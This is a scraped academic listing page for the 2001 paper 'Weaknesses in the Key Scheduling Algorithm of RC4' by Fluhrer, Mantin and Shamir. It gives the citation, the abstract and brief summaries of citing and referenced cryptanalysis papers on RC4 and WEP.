Weaknesses in the Key Scheduling Algorithm of RC4

@inproceedings{Fluhrer2001WeaknessesIT,
  title={Weaknesses in the Key Scheduling Algorithm of RC4},
  author={Scott R. Fluhrer and Itsik Mantin and Adi Shamir},
  booktitle={Selected Areas in Cryptography},
  year={2001}
}
In this paper we present several weaknesses in the key scheduling algorithm of RC4, and describe their cryptanalytic significance. [...] Key Method We use these weak keys to construct new distinguishers for RC4, and to mount related key attacks with practical complexities. Finally, we show that RC4 is completely insecure in a common mode of operation which is used in the widely deployed Wired Equivalent Privacy protocol (WEP, which is part of the 802.11 standard), in which a fixed secret key is concatenated…Expand
New Weakness in the Key-Scheduling Algorithm of RC4
TLDR
This paper proposes a method to recover an l-bit secret key from only the first l bits of the initial state of RC4 using linear equations with the time complexity less than that of one execution of KSA. Expand
Passive-Only Key Recovery Attacks on RC4
TLDR
A passive-only attack able to significantly improve the key recovery process on WEP with a data complexity of 215 eavesdropped packets is described. Expand
A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model
TLDR
A new key recovery attack under related-key model on RC4 is presented, based on the property that RC4 can generate a large amount of colliding key pairs, which is able to recover any random key in practical time when the length of the key is large under a new proposed related key model. Expand
KSAm - An Improved RC4 Key-Scheduling Algorithm for Securing WEP
TLDR
A new variant of RC4 Key-Scheduling Algorithm, called KSAm, is proposed, whose primary goal is to address the FMS (Fluhrer-Mantin-Shamir) weakness of WEP-like cryptosystems, where IV precedes the secret key. Expand
A Scheme for Key Management on Alternate Temporal Key Hash
TLDR
This paper shall propose a scheme to make key management feasible in their solution without changing the framework of the ATKH and the existing 802.11 standards. Expand
Analysis of selected methods for the recovery of encrypted WEP key
This paper deals with some of the WEP (Wired Equivalent Privacy) key decryption methods based on aircrack-ng software, which was embedded in Backtrack operating system (Linux distribution). TheExpand
Title A New Practical Key Recovery Attack on the Stream Cipher RC 4 under Related-Key Model
A new key recovery attack under related-key model on RC4 is presented in this paper. This novel attack is based on the property that RC4 can generate a large amount of colliding key pairs. By makingExpand
Expanding Weak-key Space of RC4
TLDR
This attack is the best-known single-key key recovery attack on RC4 with respect to efficiency and is applicable to any keystream, while Teramura et al. Expand
Cryptanalysis of KSAm-like Algorithms
  • B. Crainicu, B. Iantovics
  • Computer Science
  • 2008 First International Conference on Complexity and Intelligence of the Artificial and Natural Complex Systems. Medical Applications of the Complex Systems. Biomedical Computing
  • 2008
TLDR
A new variant of key-scheduling algoritm, called KSAm, is proposed, whose primary goal is to address the Fluhrer-Mantin-Shamir (FMS) weakness of WEP-like cryptosystems, where IV (initialization vector) precedes the secret key. Expand
New Form of Permutation Bias and Secret Key Leakage in Keystream Bytes of RC4
TLDR
A complete framework is presented to show that many keystream output bytes of RC4 are significantly biased towards several linear combinations of the secret key bytes, and that these biases propagate further, once the information for the index jis revealed. Expand
...
1
2
3
4
5
...

References

SHOWING 1-10 OF 22 REFERENCES
A Related-Key Cryptanalysis of RC4
TLDR
Analysis of the RC4 stream cipher shows that for each 2048-bit key there exists a family of related keys, differing in one of the byte positions, and recommends that applications of RC4 with keys longer than 128 bits discard the initial 256 bytes of the keystream output. Expand
Cryptanalysis of RC4-like Ciphers
TLDR
This analysis shows that, although the full-size RC4 remains secure against known attacks, keystreams are distinguishable from randomly generated bit streams, and the RC4 key can be recovered if a significant fraction of the full cycle of keystream bits is generated. Expand
A Practical Attack on Broadcast RC4
TLDR
A major statistical weakness in RC4 makes it trivial to distinguish between short outputs of RC4 and random strings by analyzing their second bytes, which can be used to mount a practical ciphertext-only attack on RC4 in some broadcast applications. Expand
Real Time Cryptanalysis of A5/1 on a PC
TLDR
New attacks on A5/1 are described, which are based on subtle flaws in the tap structure of the registers, their noninvertible clocking mechanism, and their frequent resets, which make it vulnerable to hardware-based attacks by large organizations, but not to software- based attacks on multiple targets by hackers. Expand
Analysis Methods for (Alleged) RC4
TLDR
The analysis methods reveal intrinsic properties of alleged RC4 which are independent of the key scheduling and the key size, and the complexity of one of the attacks is estimated to be less than the time of searching through the square root of all possible initial states. Expand
Using the Fluhrer, Mantin, and Shamir Attack to Break WEP
TLDR
It is concluded that 802.11 WEP is totally insecure, and some recommendations are provided to make the attack more efficient. Expand
Statistical Analysis of the Alleged RC4 Keystream Generator
TLDR
A method for distinguishing 8-bit RC4 from randomness is demonstrated and it is observed that an attacker can, on occasion, determine portions of the internal state with nontrivial probability. Expand
Linear Statistical Weakness of Alleged RC4 Keystream Generator
  • J. Golic
  • Mathematics, Computer Science
  • EUROCRYPT
  • 1997
A keystream generator known as RC4 is analyzed by the linear model approach. It is shown that the second binary derivative of the least significant bit output sequence is correlated to 1 with theExpand
Wireless lan medium access control (mac) and physical layer (phy) specifications
services are specified here by describing the service primitives and parameters that characterize each service. This definition is independent of any particular implementation. In particular, theExpand
Wireless lan medium access control (mac) and physical layer (phy) specifications
The medium access control (MAC) and physical characteristics for wireless local area networks (LANs) are specified in this standard, part of a series of standards for local and metropolitan areaExpand
...
1
2
3
...